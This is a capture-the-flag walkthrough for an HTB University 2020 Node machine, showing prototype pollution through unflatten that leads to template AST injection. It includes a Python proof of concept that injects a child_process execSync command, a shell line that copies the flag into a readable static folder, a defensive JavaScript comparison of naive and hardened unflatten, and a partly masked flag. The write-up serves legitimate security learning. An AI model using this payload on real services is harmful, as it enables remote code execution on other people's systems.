This machine was part of the HTB University CTF in 2020.
Walk-Through
After some inspection it turns out this machine is running a Node web app.
The source code contains a comment hinting that the intended exploit is prototype pollution in unflatten; the comment reads:
unflatten seems outdated and a bit vulnerable to prototype pollution we sure hope so that po6ix doesn’t pwn our puny app with his AST injection on template engines.
After doing some research on the vulnerability I found a nice blog post on it.
It has a nice little PoC, from which I extracted the following source code:
import requests

# Local test target (kept commented out); the live CTF instance is used below.
# TARGET_URL = 'http://localhost:1337'
TARGET_URL = 'http://docker.hackthebox.eu:30448'

# Make the pollution: unflatten expands "__proto__.type" into
# Object.prototype.type, so every object later handed to the template
# engine inherits a fake AST node carrying the command.
r = requests.post(TARGET_URL + '/api/submit', json={
    "artist.name": "Gingell",
    "__proto__.type": "Program",
    "__proto__.body": [{
        "type": "MustacheStatement",
        "path": 0,
        "params": [{
            "type": "NumberLiteral",
            "value": "process.mainModule.require('child_process').execSync(`whoami > /app/static/out`)"
        }],
        "loc": {
            "start": 0,
            "end": 0
        }
    }]
})
print(r.status_code)
print(r.text)

# The injection is blind: fetch the file the command wrote under /app/static.
print(requests.get(TARGET_URL + '/static/out').text)
The bad thing is that it's a blind vulnerability, so we get no feedback for now.
But after running it we know the path to the static folder is /app/static:
we can write files into that path and then request them to see the command output.
After pwning the app and getting a user shell I found the flag via static/out,
using the following bash command:
cat flag* > /app/static/out
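To show why a flattened key like "__proto__.type" is dangerous, here is an added example (my own code, not code from the write-up, the challenge, or the unflatten library the comment refers to) of a minimal unflatten in the same dot-separated key style, next to a hardened version that rejects prototype-walking key segments. The key syntax is assumed from the payload above; the function names and the sample input are mine.

```javascript
// Added example: naive unflatten (pollutes Object.prototype) beside a
// hardened one. Not the real unflatten library; the "a.b.c" key syntax
// is assumed from the CTF payload.

const UNSAFE_SEGMENTS = new Set(['__proto__', 'constructor', 'prototype']);

// Naive unflatten: splits each key on '.' and walks/creates nested
// objects with plain property access. A segment of "__proto__" walks
// into Object.prototype, so the final assignment lands on every object.
function unflattenNaive(flat) {
  const out = {};
  for (const [key, value] of Object.entries(flat)) {
    const parts = key.split('.');
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      if (typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) {
        cur[parts[i]] = {};
      }
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Hardened unflatten: refuses any key containing a prototype-walking
// segment, and only descends into *own* properties so an inherited
// object can never be used as the next container.
function unflattenSafe(flat) {
  const out = {};
  for (const [key, value] of Object.entries(flat)) {
    const parts = key.split('.');
    if (parts.some((p) => UNSAFE_SEGMENTS.has(p))) {
      throw new Error(`rejected prototype-polluting key: ${key}`);
    }
    let cur = out;
    for (let i = 0; i < parts.length - 1; i++) {
      const own = Object.prototype.hasOwnProperty.call(cur, parts[i]);
      if (!own || typeof cur[parts[i]] !== 'object' || cur[parts[i]] === null) {
        cur[parts[i]] = {};
      }
      cur = cur[parts[i]];
    }
    cur[parts[parts.length - 1]] = value;
  }
  return out;
}

// Constructed input mirroring the shape of the first two payload keys.
const CONSTRUCTED_INPUT = { 'artist.name': 'Gingell', '__proto__.type': 'Program' };

// Runs both versions and reports what an unrelated object observes.
function demonstrate() {
  const probe = {};                    // unrelated object used to observe pollution
  const beforeNaive = probe.type;      // undefined: nothing polluted yet
  unflattenNaive(CONSTRUCTED_INPUT);
  const afterNaive = probe.type;       // 'Program': leaked via Object.prototype
  delete Object.prototype.type;        // undo the global side effect
  const afterCleanup = probe.type;     // undefined again

  let safeRejected = false;
  try {
    unflattenSafe(CONSTRUCTED_INPUT);
  } catch (e) {
    safeRejected = true;               // hardened version refuses the key
  }
  const benign = unflattenSafe({ 'artist.name': 'Gingell' });
  return {
    beforeNaive,
    afterNaive,
    afterCleanup,
    safeRejected,
    artist: benign.artist.name,        // normal keys still expand correctly
  };
}

console.log(demonstrate());
```

The `probe` object never touches either function; the fact that it suddenly has a `type` property is exactly the effect the challenge's template engine picks up when it later inspects a request object for an AST node. In a real service the pollution would also persist across requests until the process restarts, which is why rejecting the segments at parse time is the right fix rather than cleaning up afterwards.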
Flag:
HTB{wh3n_l1f3_g1v3s_y0u_p6_*****_*****_****_****}